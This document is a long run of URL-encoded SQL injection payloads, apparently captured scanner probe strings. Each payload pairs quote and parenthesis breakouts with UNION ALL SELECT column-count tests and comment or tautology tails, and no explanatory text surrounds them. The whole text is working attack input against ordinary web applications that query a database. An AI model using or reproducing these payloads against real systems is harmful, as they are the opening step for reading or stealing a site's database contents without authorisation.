-2566%20UNION%20ALL%20SELECT%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%23 -3078%20UNION%20ALL%20SELECT%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%2C%209846%23 -5435%20UNION%20ALL%20SELECT%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%2C%205240%23 -7013%20UNION%20ALL%20SELECT%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%23 -3351%20UNION%20ALL%20SELECT%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%2C%209907%23 -5981%20UNION%20ALL%20SELECT%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%23 -3031%20UNION%20ALL%20SELECT%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%23 -7323%20UNION%20ALL%20SELECT%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%2C%204136%23 -9147%20UNION%20ALL%20SELECT%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%2C%207923%23 -5825%27%29%20UNION%20ALL%20SELECT%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%23%20AND%20%28%27syYG%27%3D%27syYG -9249%27%29%20UNION%20ALL%20SELECT%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%2C%208143%23%20AND%20%28%27SieB%27%3D%27SieB -7024%27%29%20UNION%20ALL%20SELECT%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%2C%202140%23%20AND%20%28%27NuJd%27%3D%27NuJd -3002%27%29%20UNION%20ALL%20SELECT%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%2C%207487%23%20AND%20%28%27VfwO%27%3D%27VfwO -3783%27%29%20UNION%20ALL%20SELECT%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%23%20AND%20%28%27FkoK%27%3D%27FkoK -4481%27%29%20UNION%20ALL%20SELECT%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%2C%208545%23%20AND%20%28%27OTWR%27%3D%27OTWR -4226%27%29%20UNION%20ALL%20SELECT%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341%23%20AND%20%28%27UJhx%27%3D%27UJhx -3276%27%29%20UNION%20ALL%20SELECT%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%2C%209109%23%20AND%20%28%27ILkd%27%3D%27ILkd -6781%27%29%20UNION%20ALL%20SELECT%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%23%20AND%20%28%27yMoc%27%3D%27yMoc -9375%27%29%20UNION%20ALL%20SELECT%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%2C%207454%23%20AND%20%28%27Ctdk%27%3D%27Ctdk -9631%27%29%29%20UNION%20ALL%20SELECT%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%2C%208393%23%20AND%20%28%28%27pThB%27%3D%27pThB -9451%27%29%29%20UNION%20ALL%20SELECT%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%2C%209796%23%20AND%20%28%28%27LAsu%27%3D%27LAsu -9546%27%29%29%20UNION%20ALL%20SELECT%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%23%20AND%20%28%28%27QtOH%27%3D%27QtOH -6298%27%29%29%20UNION%20ALL%20SELECT%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%23%20AND%20%28%28%27RCza%27%3D%27RCza -6550%27%29%29%20UNION%20ALL%20SELECT%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%23%20AND%20%28%28%27TDZu%27%3D%27TDZu -4251%27%29%29%20UNION%20ALL%20SELECT%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%23%20AND%20%28%28%27FKof%27%3D%27FKof -2042%27%29%29%20UNION%20ALL%20SELECT%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%2C%203266%23%20AND%20%28%28%27kRAA%27%3D%27kRAA -8364%27%29%29%20UNION%20ALL%20SELECT%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%2C%206302%23%20AND%20%28%28%27aPqV%27%3D%27aPqV -4729%27%29%29%20UNION%20ALL%20SELECT%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%2C%205206%23%20AND%20%28%28%27DAHQ%27%3D%27DAHQ -2729%27%29%29%20UNION%20ALL%20SELECT%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%2C%208609%23%20AND%20%28%28%27CKCU%27%3D%27CKCU -9677%27%29%29%29%20UNION%20ALL%20SELECT%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%23%20AND%20%28%28%28%27IApK%27%3D%27IApK -9307%27%29%29%29%20UNION%20ALL%20SELECT%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%2C%204801%23%20AND%20%28%28%28%27mVhe%27%3D%27mVhe -5924%27%29%29%29%20UNION%20ALL%20SELECT%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%23%20AND%20%28%28%28%27lxzT%27%3D%27lxzT -8233%27%29%29%29%20UNION%20ALL%20SELECT%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%23%20AND%20%28%28%28%27Xxyt%27%3D%27Xxyt -8580%27%29%29%29%20UNION%20ALL%20SELECT%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%2C%204942%23%20AND%20%28%28%28%27GJHM%27%3D%27GJHM -3248%27%29%29%29%20UNION%20ALL%20SELECT%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%23%20AND%20%28%28%28%27mjpA%27%3D%27mjpA -5853%27%29%29%29%20UNION%20ALL%20SELECT%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%2C%205329%23%20AND%20%28%28%28%27gxIz%27%3D%27gxIz -9983%27%29%29%29%20UNION%20ALL%20SELECT%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%2C%206644%23%20AND%20%28%28%28%27BNPT%27%3D%27BNPT -4175%27%29%29%29%20UNION%20ALL%20SELECT%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%23%20AND%20%28%28%28%27BYAx%27%3D%27BYAx -2658%27%29%29%29%20UNION%20ALL%20SELECT%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%23%20AND%20%28%28%28%27NeCy%27%3D%27NeCy -9551%27%20UNION%20ALL%20SELECT%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%2C%208421%23%20AND%20%27nLLV%27%3D%27nLLV -6259%27%20UNION%20ALL%20SELECT%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%2C%207053%23%20AND%20%27DDKe%27%3D%27DDKe -2894%27%20UNION%20ALL%20SELECT%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%23%20AND%20%27ZRAF%27%3D%27ZRAF -7582%27%20UNION%20ALL%20SELECT%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%23%20AND%20%27iaZC%27%3D%27iaZC -3217%27%20UNION%20ALL%20SELECT%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%2C%208068%23%20AND%20%27jFHI%27%3D%27jFHI -4868%27%20UNION%20ALL%20SELECT%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%2C%208241%23%20AND%20%27Ierr%27%3D%27Ierr -7191%27%20UNION%20ALL%20SELECT%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%2C%209653%23%20AND%20%27Andv%27%3D%27Andv -4804%27%20UNION%20ALL%20SELECT%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%2C%206612%23%20AND%20%27kZZa%27%3D%27kZZa -5018%27%20UNION%20ALL%20SELECT%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%23%20AND%20%27VQjO%27%3D%27VQjO -7943%27%20UNION%20ALL%20SELECT%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%23%20AND%20%27GjIM%27%3D%27GjIM -1194%27%29%20UNION%20ALL%20SELECT%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%2C%203324%23%20AND%20%28%27KpfK%27%20LIKE%20%27KpfK -2250%27%29%20UNION%20ALL%20SELECT%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%2C%208481%23%20AND%20%28%27THxV%27%20LIKE%20%27THxV -4264%27%29%20UNION%20ALL%20SELECT%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%2C%206518%23%20AND%20%28%27ckGY%27%20LIKE%20%27ckGY -4636%27%29%20UNION%20ALL%20SELECT%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%2C%206135%23%20AND%20%28%27VZcv%27%20LIKE%20%27VZcv -1018%27%29%20UNION%20ALL%20SELECT%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%2C%202828%23%20AND%20%28%27QlNl%27%20LIKE%20%27QlNl -2258%27%29%20UNION%20ALL%20SELECT%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%23%20AND%20%28%27UfQe%27%20LIKE%20%27UfQe -3770%27%29%20UNION%20ALL%20SELECT%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%23%20AND%20%28%27LHFA%27%20LIKE%20%27LHFA -7894%27%29%20UNION%20ALL%20SELECT%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%23%20AND%20%28%27aCGN%27%20LIKE%20%27aCGN -7429%27%29%20UNION%20ALL%20SELECT%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%2C%207511%23%20AND%20%28%27nRQP%27%20LIKE%20%27nRQP 